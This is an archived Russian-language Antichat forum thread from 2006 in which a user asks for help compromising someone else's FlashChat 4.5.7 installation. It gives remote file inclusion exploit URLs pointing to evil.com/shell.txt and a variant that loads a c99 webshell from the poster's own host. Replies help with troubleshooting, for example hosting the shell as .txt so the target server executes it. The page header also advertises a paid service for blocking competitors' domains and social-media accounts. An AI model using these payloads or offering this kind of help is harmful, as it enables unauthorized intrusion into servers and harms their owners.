Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Flashchat !!!

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Flashchat !!!

20.12.2006, 06:42

karabym

Постоянный

Регистрация: 14.12.2006

Сообщений: 455

Провел на форуме:
678331

Репутация: 44

Flashchat !!!

Приветствую!!!

Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com

Код:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

Видео данной уязвимости:

http://rapidshare.de/files/31362430/Flashchat.rar.html

------------------------------------------------------------------------------------------------

Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это:

http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt?

Идет запрос и шелл не хочет грузиться попробоал убрать [inc]

На это вебсерв отрыгивает такое:

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта
и возможно фаир рубит это дело на корню..

Вобщем или я туплю или чтото не так делаю

Пролейте свет !!!!!!

Вопрос в догонку

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!

20.12.2006, 14:29

morfey

Новичок

Регистрация: 14.12.2006

Сообщений: 26

Провел на форуме:
122689

Репутация: 7

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет.

кидай в директорию c:/webservers/home/your_site/
файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

содержанием

# dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача
# dnwr_host custom-host
# dnwr_port 80

Цитата:

Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Файр не файр но он не должен блокировать запрос скрипта на инклуд.

Цитата:

файл не должен обрабатываться на сервере где он лежит(иначе инклудиться будет результат выполнения команды на сервере-хранилище). чат инклудя твой тхт считывает его содержимое и помещает в страницу свою вот тама он и будет обрабатываться.

20.12.2006, 21:53

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли.

__________________
..

21.12.2006, 12:50

karabym

Постоянный

Регистрация: 14.12.2006

Сообщений: 455

Провел на форуме:
678331

Репутация: 44

Цитата:

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет. кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80

Забыл дополнит что все это в местной сетке adsl в тырнет доступа нет...
Но сомо собой я настройил апатчь чтобы он смотрел в
сетку с портом 80 но все равно нехочет цеплять шелл.
Но настройку я делал не через .htaccess а прописал
в httpd.conf есть ли разница ?!

Цитата:

Кстати эту багу уже почти везде закрыли.

Ну может ее много где и закрыли но у етого перца весит именно ета версия и бновлять как я вижу он ее пока не собирается

Последний раз редактировалось karabym; 21.12.2006 в 13:01..

21.12.2006, 12:59

karabym

Постоянный

Регистрация: 14.12.2006

Сообщений: 455

Провел на форуме:
678331

Репутация: 44

Цитата:

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.

Все кокраз так и делаю толко разница втом что шелл посется на моем вебсерваке..

21.12.2006, 14:17

morfey

Новичок

Регистрация: 14.12.2006

Сообщений: 26

Провел на форуме:
122689

Репутация: 7

хм. такто разницы никакой. Но поробовать стоит. Этож денвер...

21.12.2006, 14:22

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

Цитата:

файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

создать через експлорер нельзя, через командную строку - не вопрос
echo. > .htaccess

21.12.2006, 14:30

morfey

Новичок

Регистрация: 14.12.2006

Сообщений: 26

Провел на форуме:
122689

Репутация: 7

))) Ай блин. сам тупанул. чет даж мысли не возникало...

21.12.2006, 15:33

karabym

Постоянный

Регистрация: 14.12.2006

Сообщений: 455

Провел на форуме:
678331

Репутация: 44

Пробовал .htaccess создавать неканает

вобщем странно както
Возможно у него верссия подправленая хз

Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

#10

21.12.2006, 16:31

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.

__________________
..

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
FlashChat v4.7.0	†Romi4†	PHP, PERL, MySQL, JavaScript	2	15.11.2006 01:19
FlashChat v4.7.0	ZikZak	Болталка	3	14.11.2006 05:34
FlashChat	Z4netZ	Чаты	0	24.11.2004 17:49

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход